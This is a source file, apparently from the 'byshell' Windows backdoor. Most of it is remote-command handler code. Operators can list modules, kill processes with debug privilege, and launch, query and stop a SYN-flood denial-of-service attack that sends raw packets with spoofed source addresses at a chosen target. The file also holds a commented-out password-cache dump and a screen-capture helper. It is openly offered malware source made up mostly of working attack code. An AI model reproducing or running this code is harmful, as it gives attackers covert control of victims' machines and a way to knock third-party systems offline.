ntboot.cpp

byshell后门源代码

	LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
	AdjustTokenPrivileges(hToken,0,&tp, sizeof(tp),0,0);
	modpid=atoi(modinfo);HANDLE snapshot;snapshot=CreateToolhelp32Snapshot(TH32CS_SNAPMODULE,modpid);
	struct tagMODULEENTRY32 modsnap;modsnap.dwSize=sizeof(tagMODULEENTRY32);
	sprintf(workbuff,"\nmods of %d:\nmodule_id\tmodule_name\tmodule_path\n",modpid);
	for(Module32First(snapshot,&modsnap);Module32Next(snapshot,&modsnap);){
		sprintf(modinfo,"%x\t%s\t%s\n",modsnap.th32ModuleID,modsnap.szModule,modsnap.szExePath);
		strcat(workbuff,modinfo);memset(modinfo,0,256);
	}
	CloseHandle(hToken);*psendlength=strlen(workbuff);	return 0;
}
//pskill
if(workflag==0 && strncmp(workbuff,"pskill",6)==0){char procinfo[255]={0};strncpy(procinfo,workbuff+6,256);memset(workbuff,0,65520);
	if(!atoi(procinfo)){strcpy(workbuff,"illogical pid,please input a pid\n");*psendlength=strlen(workbuff);return 0;}
	HANDLE hToken;OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES,&hToken);TOKEN_PRIVILEGES tp;tp.PrivilegeCount = 1;
	LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
	AdjustTokenPrivileges(hToken,0,&tp, sizeof(tp),0,0);
	HANDLE hproc=OpenProcess(PROCESS_ALL_ACCESS,0,atoi(procinfo));  
	if(!TerminateProcess(hproc,1)){memset(workbuff,0,65520);strcpy(workbuff,"UNKNOW error:cannot kill proc.usually,this was a result of having privilege not enough.\n");*psendlength=strlen(workbuff);return 0;}
	memset(workbuff,0,65520);strcpy(workbuff,"OK,job was done,cuz we have localsystem & SE_DEBUG_NAME:)\n");*psendlength=strlen(workbuff);return 0;
}
//funstuff for release
if(workflag==0 && strncmp(workbuff,"popmsg",6)==0){
MessageBox(0,workbuff+6,"Warning",MB_OK|MB_APPLMODAL|MB_TOPMOST);strcpy(workbuff,"well done.\n");
*psendlength=strlen(workbuff);return 0;
}
if(workflag==0 && strncmp(workbuff,"swapmouse",9)==0){
SwapMouseButton(1);strcpy(workbuff,"well done.\n");
*psendlength=strlen(workbuff);return 0;
}
if(workflag==0 && strncmp(workbuff,"storemouse",10)==0){
SwapMouseButton(0);strcpy(workbuff,"well done.\n");
*psendlength=strlen(workbuff);return 0;
}
//synflood
//SYN<tab>ip or 域名<tab>wanted time<tab>fake type(0 for all fake,1 for B class fake)<tab>serioustype<tab>portdest<tab>portsource
//single thread,every 100 packets sleep(1),every 1 min break to consult the global struct
//gethostbyname ret a list to send,every 600000 pauses,about 10 mins gethostbyname flesh one time.
if(workflag==0 && strncmp(workbuff,"SYN",3)==0){
if(dos.dostype){strcpy(workbuff,"DOS already in run.\n");*psendlength=strlen(workbuff);return 0;}
dos.dostype=1;
memset(dos.target,0,200);dos.definemins=1;dos.faketype=0;dos.attackport=80;dos.useport=0;dos.serioustype=100;
//14Q:very weird.if put dos.target at 3rd in definition of dos,sscanf will fail andput 0 to the 3 first byte in dos.target
//reason:[255] or [256],memory overflowed
sscanf(workbuff+4," %s %d %d %d %d %d",dos.target,&dos.definemins,&dos.faketype,&dos.serioustype,&dos.attackport,&dos.useport);
DWORD dwThreadId=0;DWORD WINAPI threadsyn( LPVOID lpParam );
dos.threadhandle=CreateThread(0, 0, threadsyn, 0, 0, &dwThreadId);
strcpy(workbuff,"DOS in run.\n");*psendlength=strlen(workbuff);return 0;
}
//query DOS infomation
if(workflag==0 && strncmp(workbuff,"queryDOS",8)==0){
	if(!dos.dostype){strcpy(workbuff,"DOS not in run.\n");*psendlength=strlen(workbuff);return 0;}
	if(!dos.seconds){strcpy(workbuff,"DOS timer not initialized.\n");goto lab1;}
	sprintf(workbuff,"now DOS is working at mode %d,faketype %d,against %s,has worked %d minutes,by speed of %d packets/sec;you defined to work for %d minutes.\n",dos.dostype,dos.faketype,dos.target,dos.seconds/60,(dos.pausetime*dos.serioustype)/(dos.seconds),dos.definemins);
lab1:
*psendlength=strlen(workbuff);return 0;
}
//break DOS
if(workflag==0 && strncmp(workbuff,"endDOS",6)==0){TerminateThread(dos.timerhandle,0);
TerminateThread(dos.threadhandle,0);dos.dostype=0;dos.pausetime=0;dos.seconds=0;
//threadtimer may be killed afer its parent thread,but not must?
sprintf(workbuff,"%x terminated\n",dos.threadhandle);
*psendlength=strlen(workbuff);return 0;
}
//tcpstress
//serve as client 

//badcmd
memset(workbuff,0,65520);strcpy(workbuff,"bad command or instruction.\n");
*psendlength=strlen(workbuff);return 0;
}

/*
//used in work,passdump
char cachecallback(tagPASSWORD_CACHE_ENTRY * ppce,DWORD paradw){
MoveMemory(buff+16,ppce->abResource,ppce->cbResource);
buff[ppce->cbResource]=0;
//CharToOem(buff,Ob);
//wsprintf(TempBuff,"\n\n\r (USERNAME): %s \n\r (PASSWORD): ",Ob);
MoveMemory(buff+48,ppce->abResource+ppce->cbResource,ppce->cbPassword);
buff[ppce->cbPassword+32]=0;
//CharToOem(szReadBuff,Ob);
//lstrcat(TempBuff,Ob);
return 0;
}
*/


//refer to code of shotgun
//first we donot think on dns.
DWORD WINAPI threadsyn( LPVOID lpParam ){//MessageBox(0,"0",0,0);
typedef struct{BYTE h_verlen;BYTE tos;WORD total_len;WORD ident;WORD frag_and_flags;
BYTE ttl;BYTE proto;WORD checksum;DWORD sourceIP;DWORD destIP;
}IP_HEADER;IP_HEADER *ip_header;
typedef struct{WORD th_sport;WORD th_dport;DWORD th_seq;DWORD th_ack;BYTE th_lenres;
BYTE th_flag;WORD th_win;WORD th_sum;WORD th_urp;
}TCP_HEADER;TCP_HEADER *tcp_header;
typedef struct{DWORD saddr;DWORD daddr;
char mbz;char ptcl;WORD tcpl;
}PSD_HEADER;PSD_HEADER *psd_header;
char synbuff[1024]={0};ip_header=(IP_HEADER*)synbuff;
tcp_header=(TCP_HEADER*)(synbuff+sizeof(IP_HEADER));
psd_header=(PSD_HEADER*)(synbuff+sizeof(IP_HEADER)+sizeof(TCP_HEADER));
//MessageBox(0,"1",0,0);
//begin network
int ret=1;int timeout=2000;
WSADATA wsadata;WSAStartup(MAKEWORD(2,1),&wsadata);
SOCKET sockraw=socket(AF_INET,SOCK_RAW,IPPROTO_RAW);
if(!sockraw){closesocket(sockraw);WSACleanup();return 1;}//do not support sockraw
setsockopt(sockraw,IPPROTO_IP,IP_HDRINCL,(char*)&ret,4);
setsockopt(sockraw,SOL_SOCKET,SO_SNDTIMEO,(char*)&timeout,4);
//now we fill the unchaged data.changed when pause:tcpseq,srcport,destip in list.
//changed every:srcip,chksum.chaged when 60W pauses:desip(in mode nslookup)
sockaddr_in destaddr;//MessageBox(0,"2",0,0);
//12Q:why need a sock_addr and its destip,af_inet but no dest port?????????????????????????
destaddr.sin_family=AF_INET;
ip_header->h_verlen=(4<<4 | sizeof(IP_HEADER)/sizeof(DWORD));//MessageBox(0,"3",0,0);
ip_header->total_len=htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER));
ip_header->ident=1;ip_header->frag_and_flags=0;ip_header->ttl=255;ip_header->proto=IPPROTO_TCP;
ip_header->checksum=0;tcp_header->th_dport=htons(dos.attackport);
tcp_header->th_sport=htons(dos.useport);tcp_header->th_ack=0;//MessageBox(0,"4",0,0);
tcp_header->th_lenres=(sizeof(TCP_HEADER)/4<<4|0);tcp_header->th_flag=2;
tcp_header->th_win=htons(16384);tcp_header->th_urp=0;psd_header->mbz=0;psd_header->ptcl=IPPROTO_TCP;
psd_header->tcpl=htons(sizeof(TCP_HEADER));//MessageBox(0,"5",0,0);
//srand((unsigned)time());
//MessageBox(0,"6",0,0);
WORD checksum(WORD *buffer,int size);
//now we query our own ip.fixed the error of SYN in selecting net adapters
char myname[255]={0};char adap=0;struct hostent* myhost;gethostname(myname,256);myhost=gethostbyname(myname);
for(;myhost->h_addr_list[adap];++adap){}--adap;
/*for(int i=0;(myhost->h_addr_list[i]);++i)
{MessageBox(0,inet_ntoa(*(struct in_addr*)(myhost->h_addr_list[i])),"ip",0);}*/

//start the timer
//13Q:SetTimer(0,0,1000,timerfunc); without a window func msg circulation,timer callback could not be called.
//so we create a thread to solve this.
DWORD dwThreadId=0;DWORD __stdcall threadtimer(LPVOID lpParam);DWORD myrand(void);
dos.timerhandle=CreateThread(0, 0, threadtimer, 0, 0, &dwThreadId);

//start while
while(1){
if(!(dos.pausetime%600000)){
	if(inet_addr(dos.target)!=INADDR_NONE){destaddr.sin_addr.s_addr=inet_addr(dos.target);ip_header->destIP=destaddr.sin_addr.s_addr;psd_header->daddr=ip_header->destIP;}
	else{return 2;}//later we write the code of nslookup
}
if(!dos.useport){tcp_header->th_sport=htons((unsigned short)myrand());}
//then change ip in list
tcp_header->th_seq=(((unsigned)myrand()+0x4000)<<16)+(unsigned)myrand()+0x4000;
for(int i=0;i<=dos.serioustype;++i){
	if(dos.faketype==0){ip_header->sourceIP=(((unsigned)myrand()+(unsigned)myrand())<<16)+(unsigned)myrand()+(unsigned)myrand();}
	else if(dos.faketype==1){ip_header->sourceIP=((*(int*)(myhost->h_addr_list[adap]))&0x0000ffff)+(((unsigned)myrand()+(unsigned)myrand())<<16);}
	else if(dos.faketype==2){ip_header->sourceIP=*(int*)(myhost->h_addr_list[adap]);}
	else{}
psd_header->saddr=ip_header->sourceIP;//void putdbstring(DWORD);putdbstring(ip_header->sourceIP);
//count chksum
ip_header->checksum=0;tcp_header->th_sum=0;
tcp_header->th_sum=checksum((WORD*)(synbuff+sizeof(IP_HEADER)),sizeof(TCP_HEADER)+sizeof(PSD_HEADER));
ip_header->checksum=checksum((WORD*)synbuff,sizeof(IP_HEADER)+sizeof(TCP_HEADER));
sendto(sockraw,synbuff,sizeof(IP_HEADER)+sizeof(TCP_HEADER),0,(struct sockaddr*)&destaddr,sizeof(destaddr));
}
Sleep(1);dos.pausetime++;
}//end while
return 0x0fffffff;
}
/*
void putdbstring(DWORD a){
HANDLE filefp;
filefp=CreateFile("d:\\syn.txt",GENERIC_WRITE,0,0,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
SetFilePointer(filefp,0,0,FILE_END);
DWORD byteswritten;WriteFile(filefp,inet_ntoa(*(in_addr*)&a),strlen(inet_ntoa(*(in_addr*)&a)),&byteswritten,0);
WriteFile(filefp,"\t",1,&byteswritten,0);
CloseHandle(filefp);
return;
}*/

DWORD myrand(void){
//The constant RAND_MAX is the maximum value that can be returned by the rand function. RAND_MAX is defined as the value 0x7fff.
LARGE_INTEGER li;QueryPerformanceCounter(&li);
return (li.LowPart%0x7fff);
}

//from shotgun,can be improved
WORD checksum(WORD *buffer,int size){
DWORD cksum=0;
while(size>1){cksum+=*buffer++;size-=2;}
if(size){cksum+=*(BYTE*)buffer;}
cksum=(cksum>>16)+(cksum & 0xffff);
cksum+=(cksum>>16);
return (WORD)(~cksum);
}

DWORD __stdcall threadtimer(LPVOID lpParam){
while(1){Sleep(1000);++dos.seconds;
if(dos.definemins<=dos.seconds/60){TerminateThread(dos.threadhandle,0);dos.dostype=0;dos.pausetime=0;dos.seconds=0;ExitThread(0);}
}
return 0x7fffffff;
}

//by hzzh
HANDLE DDBtoDIB( HBITMAP bitmap, DWORD dwCompression, HPALETTE  hPal,DWORD * sizeimage) 
{
    BITMAP            bm;
    BITMAPINFOHEADER    bi;
     LPBITMAPINFOHEADER     lpbi;
    DWORD            dwLen;
    HANDLE            hDib;
    HANDLE            handle;
    HDC             hdc;

    // the function has no arg for bitfields
    if( dwCompression == BI_BITFIELDS )
        return NULL;

    // if a palette has not been supplied use defaul palette
    if (hPal==NULL)
        hPal = (HPALETTE) GetStockObject(DEFAULT_PALETTE );

    // get bitmap information
    ::GetObject(bitmap,sizeof(bm),(LPSTR)&bm);

    // initialize the bitmapinfoheader
    bi.biSize        = sizeof(BITMAPINFOHEADER);
    bi.biWidth        = bm.bmWidth;
    bi.biHeight         = bm.bmHeight;
    bi.biPlanes         = 1;
    bi.biBitCount        = bm.bmPlanes * bm.bmBitsPixel;
    bi.biCompression    = dwCompression;
    bi.biSizeImage        = 0;
    bi.biXPelsPerMeter    = 0;
    bi.biYPelsPerMeter    = 0;
    bi.biClrUsed        = 0;
    bi.biClrImportant    = 0;

    // compute the size of the  infoheader and the color table
    int ncolors = (1 << bi.biBitCount); if( ncolors> 256 ) 
        ncolors = 0;
    dwLen  = bi.biSize + ncolors * sizeof(RGBQUAD);

    // we need a device context to get the dib from
    hdc = GetDC(NULL);
    hPal = SelectPalette(hdc,hPal,FALSE);
    RealizePalette(hdc);

    // allocate enough memory to hold bitmapinfoheader and color table
    hDib = GlobalAlloc(GMEM_FIXED,dwLen);

    if (!hDib){
        SelectPalette(hdc,hPal,FALSE);
        ReleaseDC(NULL,hdc);
        return NULL;
    }

    lpbi = (LPBITMAPINFOHEADER)hDib;
    *lpbi = bi;
    // call getdibits with a NULL lpbits param, so the device driver 
    // will calculate the bisizeimage field 
    GetDIBits(hdc, bitmap, 0L, (DWORD)bi.biHeight,
            (LPBYTE)NULL, (LPBITMAPINFO)lpbi, (DWORD)DIB_RGB_COLORS );

    bi = *lpbi;
    // if the driver did not fill in the bisizeimage field, then compute it
    // each scan line of the image is aligned on a dword (32bit) boundary
    if (bi.biSizeImage == 0){
        bi.biSizeImage = ((((bi.biWidth * bi.biBitCount) + 31) & ~31) / 8) 
                        * bi.biHeight;

        // if a compression scheme is used the result may infact be larger
        // increase the size to account for this.
        if (dwCompression != BI_RGB)
            bi.biSizeImage = (bi.biSizeImage * 3) / 2;
    }

    // realloc the buffer so that it can hold all the bits
    dwLen += bi.biSizeImage;
    if (handle = GlobalReAlloc(hDib, dwLen, GMEM_MOVEABLE))
        hDib = handle;
    else{
        GlobalFree(hDib);

        // reselect the original palette
        SelectPalette(hdc,hPal,FALSE);
        ReleaseDC(NULL,hdc);
        return NULL;
    }

    // get the bitmap bits
    lpbi = (LPBITMAPINFOHEADER)hDib;

    // finally get the dib
    BOOL bgotbits = GetDIBits( hdc, bitmap,
                0L,                // start scan line
                (DWORD)bi.biHeight,        // # of scan lines
                (LPBYTE)lpbi             // address for bitmap bits
                + (bi.biSize + ncolors * sizeof(RGBQUAD)),
                (LPBITMAPINFO)lpbi,        // address of bitmapinfo
                (DWORD)DIB_RGB_COLORS);        // use rgb for color table

    if( !bgotbits )
    {
        GlobalFree(hDib);
        
        SelectPalette(hdc,hPal,FALSE);
        ReleaseDC(NULL,hdc);
		return NULL;
    }

    SelectPalette(hdc,hPal,FALSE);
    ReleaseDC(NULL,hdc);
	*sizeimage=bi.biSizeImage;
    return hDib;
}